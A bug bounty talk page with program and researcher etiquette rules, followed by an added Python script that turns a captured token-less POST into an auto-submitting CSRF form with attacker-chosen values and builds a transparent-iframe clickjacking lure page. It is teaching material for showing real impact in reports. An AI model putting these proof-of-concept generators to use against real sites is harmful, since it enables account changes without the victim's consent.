• Offer HoF (or) Swag (or) Reward (or) Duplicate
• Get all the vulnerabilities and fix them ASAP!
• Make products and applications secure
Researcher:
• Find the vulnerabilities in the target
• Get mostly duplicates :P
• Otherwise HoF, Swag (or) Reward!
• Share on social networks
• Chances of finding bugs to put on your resume
• Possibility of getting a job in the industry
• Opportunity to make money while attending college
• Working with researchers/hackers from all over the world
you don't want to be an underdog.
• Do not use any automated scanners. It's lame (it's OK if you use your own tools; don't tell me you're the author of the Acunetix scanner =]], pretty lame).
• Do not make any information public until the issue has been resolved.
• Do not report a missing protection mechanism or a deviation from best practice (e.g. no CSRF token, no framing/clickjacking protection) without demonstrating real security impact for the user or the system.
• Don't ask for money or "swag" if it's not mentioned in the rules.
• Don't compare two programs. Two programs = two different budgets.
• Don't audit without permission. Legal issues.
• Respect the program's decisions.
• Respect other researchers.
• Quality over quantity: reputation in the industry.
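The rule about not reporting a missing CSRF token or framing header without real impact is the one worth a worked example. The script below is an added example written for this page, not code from the talk: it takes a constructed capture of a token-less, state-changing POST to the hypothetical host example.test, turns it into an auto-submitting cross-site form with attacker-chosen values, checks whether the session cookie's SameSite attribute would block the replay anyway, and only emits a framing page for a URL whose response actually lacks both X-Frame-Options and a CSP frame-ancestors directive.

```python
"""Turn a captured request into a CSRF / clickjacking proof of concept.

Added example for this talk, not code from the original slides. The captured
request and the host example.test are constructed for illustration.
"""
from html import escape
from urllib.parse import parse_qsl

# Constructed capture of a state-changing POST that carries no anti-CSRF token.
CAPTURED_REQUEST = """POST /account/email HTTP/1.1
Host: example.test
Content-Type: application/x-www-form-urlencoded
Cookie: session=abc123

email=victim%40example.test"""


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def samesite_blocks_post(set_cookie):
    """True if the cookie's SameSite attribute stops a cross-site POST.

    Strict and Lax both withhold the cookie on a cross-site POST; None sends
    it. Returns None when the attribute is absent, because the browser default
    then decides and the PoC has to be confirmed in a real browser.
    """
    for attr in set_cookie.split(";")[1:]:
        key, _, value = attr.strip().partition("=")
        if key.lower() == "samesite":
            return value.strip().lower() in ("strict", "lax")
    return None


def csrf_poc(raw, overrides):
    """Build an auto-submitting HTML form that replays the captured POST from
    an attacker page, substituting attacker-chosen values for the victim's."""
    method, path, headers, body = parse_request(raw)
    if method.upper() != "POST":
        # HTML forms can only send GET or POST; other methods need another PoC.
        raise ValueError("this PoC generator only replays POST requests")
    params = dict(parse_qsl(body, keep_blank_values=True))
    params.update(overrides)
    action = f"https://{headers['host']}{path}"
    inputs = "".join(
        f'<input type="hidden" name="{escape(k, quote=True)}" '
        f'value="{escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="{method}" action="{escape(action, quote=True)}">'
        f"{inputs}</form></body></html>"
    )


def clickjacking_poc(url, response_headers):
    """Return a transparent-iframe page only if the response lacks framing
    protection (X-Frame-Options DENY/SAMEORIGIN or CSP frame-ancestors)."""
    hdrs = {k.lower(): v for k, v in response_headers.items()}
    if hdrs.get("x-frame-options", "").upper() in ("DENY", "SAMEORIGIN"):
        return None
    if "frame-ancestors" in hdrs.get("content-security-policy", "").lower():
        return None
    return (
        "<html><body><p>Click the button below to claim your prize</p>"
        f'<iframe src="{escape(url, quote=True)}" '
        'style="opacity:0;position:absolute;top:0;left:0;width:600px;height:400px">'
        "</iframe></body></html>"
    )


if __name__ == "__main__":
    print(csrf_poc(CAPTURED_REQUEST, {"email": "attacker@example.test"}))
    print(samesite_blocks_post("session=abc123; Path=/; SameSite=Lax"))
```

A PoC that fires but changes nothing, or whose cookie is withheld by SameSite=Lax, is exactly the "no real impact" report the rule warns against. Attach the generated page together with the victim account's state before and after loading it; that before/after difference is the impact the triager is asking for.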
Meanwhile, for a SQL injection in http://br.educacao.yahoo.net (out of scope), Yahoo decided this report was not eligible for a bounty. It's OK, it's Yahoo's logic.